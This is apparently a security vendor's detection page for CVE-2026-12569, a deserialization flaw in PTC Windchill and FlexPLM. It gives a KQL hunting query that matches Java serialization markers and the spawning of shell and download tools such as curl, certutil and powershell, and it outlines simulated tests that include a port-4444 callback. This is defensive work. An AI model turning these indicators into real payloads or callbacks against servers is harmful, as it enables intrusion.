CVE-2026-12569 - PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization
Detects exploitation attempts targeting CVE-2026-12569, an improper input validation and unsafe deserialization vulnerability (CWE-20, CWE-502) in PTC Windchill and FlexPLM. This vulnerability is listed in CISA KEV, indicating active exploitation in the wild. Attackers may leverage this to achieve remote code execution via crafted serialized objects or malformed input submitted to Windchill/FlexPLM HTTP endpoints.
Vulnerability Intelligence
KEV — Known ExploitedAffected Software
- Vendor
- PTC
- Product
- Windchill and FlexPLM
Timeline
- Disclosed
- June 25, 2026
References & Proof of Concept
- https://www.ptc.com/en/support/article/CS473270
- https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk
- https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk
- https://nvd.nist.gov/vuln/detail/CVE-2026-12569
What is CVE-2026-12569 CVE-2026-12569 - PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization?
CVE-2026-12569 - PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization (CVE-2026-12569) maps to the Initial Access and Execution and Lateral Movement tactics — the adversary is trying to get into your network in MITRE ATT&CK.
This page provides production-ready detection logic for CVE-2026-12569 - PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization, covering the data sources and telemetry it touches: DeviceNetworkEvents, DeviceProcessEvents, CommonSecurityLog, AzureActivity. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
union DeviceNetworkEvents, DeviceProcessEvents, CommonSecurityLog
| where TimeGenerated > ago(7d)
| where (
(DeviceName has_any ("windchill", "flexplm") or Computer has_any ("windchill", "flexplm"))
or (RequestURL has_any ("/Windchill/", "/FlexPLM/", "/ptc/", "/servlet/", "/wt.httpgw"))
or (DestinationPort in (80, 443, 8080, 8443) and (RequestURL contains "java.io.ObjectInputStream" or RequestURL contains "rO0AB" or RequestURL contains "aced0005"))
)
| where (
InitiatingProcessCommandLine has_any ("cmd.exe", "powershell", "bash", "sh", "wget", "curl", "certutil")
or RequestURL has_any ("java.lang.Runtime", "ProcessBuilder", "rO0AB", "aced")
or Activity has "Exploit"
or AdditionalExtensions has_any ("CVE-2026-12569", "deserialization", "ObjectInputStream")
)
| project TimeGenerated, Computer, DeviceName, InitiatingProcessCommandLine, RequestURL, SourceIP, DestinationIP, DestinationPort, Activity, AdditionalExtensions
| order by TimeGenerated descDetects suspicious activity against PTC Windchill and FlexPLM servers including potential deserialization payload indicators (Java serialized object magic bytes rO0AB/aced0005) in HTTP traffic, and post-exploitation process spawning from the application server process.
Data Sources
Required Tables
False Positives
- Legitimate administrative access to Windchill or FlexPLM via standard HTTP endpoints
- Internal vulnerability scanners running against PTC product endpoints
- Authorized penetration testing or red team exercises targeting the PLM environment
- Java RMI or legitimate serialized session data transmitted over normal application workflows
Sigma rule & cross-platform mapping
The detection logic for CVE-2026-12569 - PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization (CVE-2026-12569) above is provided in a vendor-neutral
form so you can deploy it on any SIEM. The same logic is shipped here as native
KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the
following logsource:
logsource:
category: process_creation
product: windowsBrowse the community-maintained Sigma rules for this technique:
Platform-specific guides for CVE-2026-12569
References (4)
- https://www.ptc.com/en/support/article/CS473270
- https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk
- https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk
- https://nvd.nist.gov/vuln/detail/CVE-2026-12569
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1CVE-2026-12569 - Simulated Java Deserialization Payload HTTP Request to Windchill Endpoint
Expected signal: Proxy or WAF logs should capture the POST request to /Windchill/servlet/WindchillAuthenticator with raw body containing aced0005 (Java serialization magic bytes). Network capture (Wireshark/tcpdump) will show the octets 0xAC 0xED 0x00 0x05 in the TCP stream.
- Test 2CVE-2026-12569 - Simulate Post-Exploitation Shell Spawn from Java Parent (Windows)
Expected signal: Windows Security Event ID 4688 (Process Creation) showing cmd.exe with parent process java.exe. EDR (CrowdStrike/Defender) ProcessRollup2 event with ParentBaseFileName=java.exe and FileName=cmd.exe.
- Test 3CVE-2026-12569 - Simulate Post-Exploitation Outbound C2 from Windchill Server (Linux)
Expected signal: Network connection logs (Elastic/Zeek/firewall) showing outbound TCP connection from Windchill server to external IP on port 4444. Process ancestry in EDR showing bash/curl invoked with suspicious URL parameters (hostname, whoami output).
Unlock Pro Content
Get the full detection package for CVE-2026-12569 including response playbook, investigation guide, and atomic red team tests.